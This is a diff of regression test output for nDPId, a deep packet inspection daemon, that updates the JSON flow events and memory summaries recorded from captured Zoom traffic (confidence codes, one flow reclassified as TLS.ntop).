+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":700,"packets-processed":697,"total-skipped-flows":0,"total-l4-payload-len":329478,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":31,"total-detection-updates":23,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":211,"global_ts_msec":1569520473198} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 700/697 @@ -217,9 +217,9 @@ ~~ total active/idle flows...: 33/33 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6063283 bytes -~~ total memory freed........: 6063283 bytes -~~ total allocations/frees...: 119019/119019 +~~ total memory allocated....: 6196917 bytes +~~ total memory freed........: 6196917 bytes +~~ total allocations/frees...: 121781/121781 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 187 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/zoom2.pcap.out b/test/results/zoom2.pcap.out index 3b4e2f586..7cafc5787 100644 --- a/test/results/zoom2.pcap.out +++ b/test/results/zoom2.pcap.out @@ -4,9 +4,9 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} -01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 